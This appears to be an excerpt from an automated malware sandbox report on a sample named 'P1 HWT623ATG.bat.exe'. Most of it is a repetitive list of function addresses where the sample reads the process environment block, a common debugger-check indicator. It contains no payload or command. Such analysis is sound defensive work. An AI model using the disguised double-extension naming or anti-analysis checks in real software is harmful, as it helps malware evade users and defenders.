Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240770 mov eax, dword ptr fs:[00000030h]	9_2_01240770
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240770 mov eax, dword ptr fs:[00000030h]	9_2_01240770
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126674D mov esi, dword ptr fs:[00000030h]	9_2_0126674D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126674D mov eax, dword ptr fs:[00000030h]	9_2_0126674D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126674D mov eax, dword ptr fs:[00000030h]	9_2_0126674D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01230750 mov eax, dword ptr fs:[00000030h]	9_2_01230750
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BE75D mov eax, dword ptr fs:[00000030h]	9_2_012BE75D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272750 mov eax, dword ptr fs:[00000030h]	9_2_01272750
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272750 mov eax, dword ptr fs:[00000030h]	9_2_01272750
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B4755 mov eax, dword ptr fs:[00000030h]	9_2_012B4755
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012307AF mov eax, dword ptr fs:[00000030h]	9_2_012307AF
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E47A0 mov eax, dword ptr fs:[00000030h]	9_2_012E47A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D678E mov eax, dword ptr fs:[00000030h]	9_2_012D678E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012527ED mov eax, dword ptr fs:[00000030h]	9_2_012527ED
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012527ED mov eax, dword ptr fs:[00000030h]	9_2_012527ED
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012527ED mov eax, dword ptr fs:[00000030h]	9_2_012527ED
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BE7E1 mov eax, dword ptr fs:[00000030h]	9_2_012BE7E1
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012347FB mov eax, dword ptr fs:[00000030h]	9_2_012347FB
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012347FB mov eax, dword ptr fs:[00000030h]	9_2_012347FB
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123C7C0 mov eax, dword ptr fs:[00000030h]	9_2_0123C7C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B07C3 mov eax, dword ptr fs:[00000030h]	9_2_012B07C3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124E627 mov eax, dword ptr fs:[00000030h]	9_2_0124E627
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01266620 mov eax, dword ptr fs:[00000030h]	9_2_01266620
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01268620 mov eax, dword ptr fs:[00000030h]	9_2_01268620
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123262C mov eax, dword ptr fs:[00000030h]	9_2_0123262C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AE609 mov eax, dword ptr fs:[00000030h]	9_2_012AE609
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124260B mov eax, dword ptr fs:[00000030h]	9_2_0124260B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124260B mov eax, dword ptr fs:[00000030h]	9_2_0124260B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124260B mov eax, dword ptr fs:[00000030h]	9_2_0124260B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124260B mov eax, dword ptr fs:[00000030h]	9_2_0124260B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124260B mov eax, dword ptr fs:[00000030h]	9_2_0124260B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124260B mov eax, dword ptr fs:[00000030h]	9_2_0124260B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124260B mov eax, dword ptr fs:[00000030h]	9_2_0124260B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272619 mov eax, dword ptr fs:[00000030h]	9_2_01272619
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F866E mov eax, dword ptr fs:[00000030h]	9_2_012F866E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F866E mov eax, dword ptr fs:[00000030h]	9_2_012F866E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126A660 mov eax, dword ptr fs:[00000030h]	9_2_0126A660
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126A660 mov eax, dword ptr fs:[00000030h]	9_2_0126A660
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01262674 mov eax, dword ptr fs:[00000030h]	9_2_01262674
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0124C640 mov eax, dword ptr fs:[00000030h]	9_2_0124C640
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126C6A6 mov eax, dword ptr fs:[00000030h]	9_2_0126C6A6
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012666B0 mov eax, dword ptr fs:[00000030h]	9_2_012666B0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01234690 mov eax, dword ptr fs:[00000030h]	9_2_01234690
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01234690 mov eax, dword ptr fs:[00000030h]	9_2_01234690
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AE6F2 mov eax, dword ptr fs:[00000030h]	9_2_012AE6F2
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AE6F2 mov eax, dword ptr fs:[00000030h]	9_2_012AE6F2
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AE6F2 mov eax, dword ptr fs:[00000030h]	9_2_012AE6F2
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AE6F2 mov eax, dword ptr fs:[00000030h]	9_2_012AE6F2
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B06F1 mov eax, dword ptr fs:[00000030h]	9_2_012B06F1
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B06F1 mov eax, dword ptr fs:[00000030h]	9_2_012B06F1
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126A6C7 mov ebx, dword ptr fs:[00000030h]	9_2_0126A6C7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126A6C7 mov eax, dword ptr fs:[00000030h]	9_2_0126A6C7
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B892A mov eax, dword ptr fs:[00000030h]	9_2_012B892A
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C892B mov eax, dword ptr fs:[00000030h]	9_2_012C892B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AE908 mov eax, dword ptr fs:[00000030h]	9_2_012AE908
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AE908 mov eax, dword ptr fs:[00000030h]	9_2_012AE908
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BC912 mov eax, dword ptr fs:[00000030h]	9_2_012BC912
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01228918 mov eax, dword ptr fs:[00000030h]	9_2_01228918
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01228918 mov eax, dword ptr fs:[00000030h]	9_2_01228918
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01256962 mov eax, dword ptr fs:[00000030h]	9_2_01256962
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01256962 mov eax, dword ptr fs:[00000030h]	9_2_01256962
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01256962 mov eax, dword ptr fs:[00000030h]	9_2_01256962
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0127096E mov eax, dword ptr fs:[00000030h]	9_2_0127096E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0127096E mov edx, dword ptr fs:[00000030h]	9_2_0127096E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0127096E mov eax, dword ptr fs:[00000030h]	9_2_0127096E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D4978 mov eax, dword ptr fs:[00000030h]	9_2_012D4978
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D4978 mov eax, dword ptr fs:[00000030h]	9_2_012D4978
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BC97C mov eax, dword ptr fs:[00000030h]	9_2_012BC97C
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B0946 mov eax, dword ptr fs:[00000030h]	9_2_012B0946
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01304940 mov eax, dword ptr fs:[00000030h]	9_2_01304940
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0 mov eax, dword ptr fs:[00000030h]	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0 mov eax, dword ptr fs:[00000030h]	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0 mov eax, dword ptr fs:[00000030h]	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0 mov eax, dword ptr fs:[00000030h]	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0 mov eax, dword ptr fs:[00000030h]	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0 mov eax, dword ptr fs:[00000030h]	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0 mov eax, dword ptr fs:[00000030h]	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0 mov eax, dword ptr fs:[00000030h]	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0 mov eax, dword ptr fs:[00000030h]	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0 mov eax, dword ptr fs:[00000030h]	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0 mov eax, dword ptr fs:[00000030h]	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0 mov eax, dword ptr fs:[00000030h]	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012429A0 mov eax, dword ptr fs:[00000030h]	9_2_012429A0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012309AD mov eax, dword ptr fs:[00000030h]	9_2_012309AD
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012309AD mov eax, dword ptr fs:[00000030h]	9_2_012309AD
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B89B3 mov esi, dword ptr fs:[00000030h]	9_2_012B89B3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B89B3 mov eax, dword ptr fs:[00000030h]	9_2_012B89B3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012B89B3 mov eax, dword ptr fs:[00000030h]	9_2_012B89B3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BE9E0 mov eax, dword ptr fs:[00000030h]	9_2_012BE9E0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012629F9 mov eax, dword ptr fs:[00000030h]	9_2_012629F9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012629F9 mov eax, dword ptr fs:[00000030h]	9_2_012629F9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C69C0 mov eax, dword ptr fs:[00000030h]	9_2_012C69C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0123A9D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0123A9D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0123A9D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0123A9D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0123A9D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0123A9D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012649D0 mov eax, dword ptr fs:[00000030h]	9_2_012649D0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FA9D3 mov eax, dword ptr fs:[00000030h]	9_2_012FA9D3
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01252835 mov eax, dword ptr fs:[00000030h]	9_2_01252835
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01252835 mov eax, dword ptr fs:[00000030h]	9_2_01252835
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01252835 mov eax, dword ptr fs:[00000030h]	9_2_01252835
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01252835 mov ecx, dword ptr fs:[00000030h]	9_2_01252835
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01252835 mov eax, dword ptr fs:[00000030h]	9_2_01252835
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01252835 mov eax, dword ptr fs:[00000030h]	9_2_01252835
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126A830 mov eax, dword ptr fs:[00000030h]	9_2_0126A830
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D483A mov eax, dword ptr fs:[00000030h]	9_2_012D483A
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D483A mov eax, dword ptr fs:[00000030h]	9_2_012D483A
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BC810 mov eax, dword ptr fs:[00000030h]	9_2_012BC810
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BE872 mov eax, dword ptr fs:[00000030h]	9_2_012BE872
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BE872 mov eax, dword ptr fs:[00000030h]	9_2_012BE872
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C6870 mov eax, dword ptr fs:[00000030h]	9_2_012C6870
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C6870 mov eax, dword ptr fs:[00000030h]	9_2_012C6870
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01242840 mov ecx, dword ptr fs:[00000030h]	9_2_01242840
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01260854 mov eax, dword ptr fs:[00000030h]	9_2_01260854
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01234859 mov eax, dword ptr fs:[00000030h]	9_2_01234859
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01234859 mov eax, dword ptr fs:[00000030h]	9_2_01234859
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01230887 mov eax, dword ptr fs:[00000030h]	9_2_01230887
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BC89D mov eax, dword ptr fs:[00000030h]	9_2_012BC89D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FA8E4 mov eax, dword ptr fs:[00000030h]	9_2_012FA8E4
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126C8F9 mov eax, dword ptr fs:[00000030h]	9_2_0126C8F9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126C8F9 mov eax, dword ptr fs:[00000030h]	9_2_0126C8F9
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125E8C0 mov eax, dword ptr fs:[00000030h]	9_2_0125E8C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_013008C0 mov eax, dword ptr fs:[00000030h]	9_2_013008C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125EB20 mov eax, dword ptr fs:[00000030h]	9_2_0125EB20
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125EB20 mov eax, dword ptr fs:[00000030h]	9_2_0125EB20
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F8B28 mov eax, dword ptr fs:[00000030h]	9_2_012F8B28
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012F8B28 mov eax, dword ptr fs:[00000030h]	9_2_012F8B28
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01304B00 mov eax, dword ptr fs:[00000030h]	9_2_01304B00
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AEB1D mov eax, dword ptr fs:[00000030h]	9_2_012AEB1D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AEB1D mov eax, dword ptr fs:[00000030h]	9_2_012AEB1D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AEB1D mov eax, dword ptr fs:[00000030h]	9_2_012AEB1D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AEB1D mov eax, dword ptr fs:[00000030h]	9_2_012AEB1D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AEB1D mov eax, dword ptr fs:[00000030h]	9_2_012AEB1D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AEB1D mov eax, dword ptr fs:[00000030h]	9_2_012AEB1D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AEB1D mov eax, dword ptr fs:[00000030h]	9_2_012AEB1D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AEB1D mov eax, dword ptr fs:[00000030h]	9_2_012AEB1D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012AEB1D mov eax, dword ptr fs:[00000030h]	9_2_012AEB1D
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0122CB7E mov eax, dword ptr fs:[00000030h]	9_2_0122CB7E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E4B4B mov eax, dword ptr fs:[00000030h]	9_2_012E4B4B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E4B4B mov eax, dword ptr fs:[00000030h]	9_2_012E4B4B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01302B57 mov eax, dword ptr fs:[00000030h]	9_2_01302B57
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01302B57 mov eax, dword ptr fs:[00000030h]	9_2_01302B57
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01302B57 mov eax, dword ptr fs:[00000030h]	9_2_01302B57
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01302B57 mov eax, dword ptr fs:[00000030h]	9_2_01302B57
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C6B40 mov eax, dword ptr fs:[00000030h]	9_2_012C6B40
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012C6B40 mov eax, dword ptr fs:[00000030h]	9_2_012C6B40
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012FAB40 mov eax, dword ptr fs:[00000030h]	9_2_012FAB40
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012D8B42 mov eax, dword ptr fs:[00000030h]	9_2_012D8B42
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DEB50 mov eax, dword ptr fs:[00000030h]	9_2_012DEB50
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240BBE mov eax, dword ptr fs:[00000030h]	9_2_01240BBE
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240BBE mov eax, dword ptr fs:[00000030h]	9_2_01240BBE
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E4BB0 mov eax, dword ptr fs:[00000030h]	9_2_012E4BB0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012E4BB0 mov eax, dword ptr fs:[00000030h]	9_2_012E4BB0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01238BF0 mov eax, dword ptr fs:[00000030h]	9_2_01238BF0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01238BF0 mov eax, dword ptr fs:[00000030h]	9_2_01238BF0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01238BF0 mov eax, dword ptr fs:[00000030h]	9_2_01238BF0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125EBFC mov eax, dword ptr fs:[00000030h]	9_2_0125EBFC
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BCBF0 mov eax, dword ptr fs:[00000030h]	9_2_012BCBF0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01250BCB mov eax, dword ptr fs:[00000030h]	9_2_01250BCB
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01250BCB mov eax, dword ptr fs:[00000030h]	9_2_01250BCB
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01250BCB mov eax, dword ptr fs:[00000030h]	9_2_01250BCB
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01230BCD mov eax, dword ptr fs:[00000030h]	9_2_01230BCD
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01230BCD mov eax, dword ptr fs:[00000030h]	9_2_01230BCD
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01230BCD mov eax, dword ptr fs:[00000030h]	9_2_01230BCD
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DEBD0 mov eax, dword ptr fs:[00000030h]	9_2_012DEBD0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126CA24 mov eax, dword ptr fs:[00000030h]	9_2_0126CA24
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0125EA2E mov eax, dword ptr fs:[00000030h]	9_2_0125EA2E
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01254A35 mov eax, dword ptr fs:[00000030h]	9_2_01254A35
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01254A35 mov eax, dword ptr fs:[00000030h]	9_2_01254A35
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126CA38 mov eax, dword ptr fs:[00000030h]	9_2_0126CA38
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012BCA11 mov eax, dword ptr fs:[00000030h]	9_2_012BCA11
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126CA6F mov eax, dword ptr fs:[00000030h]	9_2_0126CA6F
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126CA6F mov eax, dword ptr fs:[00000030h]	9_2_0126CA6F
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126CA6F mov eax, dword ptr fs:[00000030h]	9_2_0126CA6F
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012DEA60 mov eax, dword ptr fs:[00000030h]	9_2_012DEA60
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012ACA72 mov eax, dword ptr fs:[00000030h]	9_2_012ACA72
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012ACA72 mov eax, dword ptr fs:[00000030h]	9_2_012ACA72
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01236A50 mov eax, dword ptr fs:[00000030h]	9_2_01236A50
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01236A50 mov eax, dword ptr fs:[00000030h]	9_2_01236A50
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01236A50 mov eax, dword ptr fs:[00000030h]	9_2_01236A50
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01236A50 mov eax, dword ptr fs:[00000030h]	9_2_01236A50
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01236A50 mov eax, dword ptr fs:[00000030h]	9_2_01236A50
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01236A50 mov eax, dword ptr fs:[00000030h]	9_2_01236A50
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01236A50 mov eax, dword ptr fs:[00000030h]	9_2_01236A50
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240A5B mov eax, dword ptr fs:[00000030h]	9_2_01240A5B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01240A5B mov eax, dword ptr fs:[00000030h]	9_2_01240A5B
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01238AA0 mov eax, dword ptr fs:[00000030h]	9_2_01238AA0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01238AA0 mov eax, dword ptr fs:[00000030h]	9_2_01238AA0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01286AA4 mov eax, dword ptr fs:[00000030h]	9_2_01286AA4
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123EA80 mov eax, dword ptr fs:[00000030h]	9_2_0123EA80
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123EA80 mov eax, dword ptr fs:[00000030h]	9_2_0123EA80
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123EA80 mov eax, dword ptr fs:[00000030h]	9_2_0123EA80
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123EA80 mov eax, dword ptr fs:[00000030h]	9_2_0123EA80
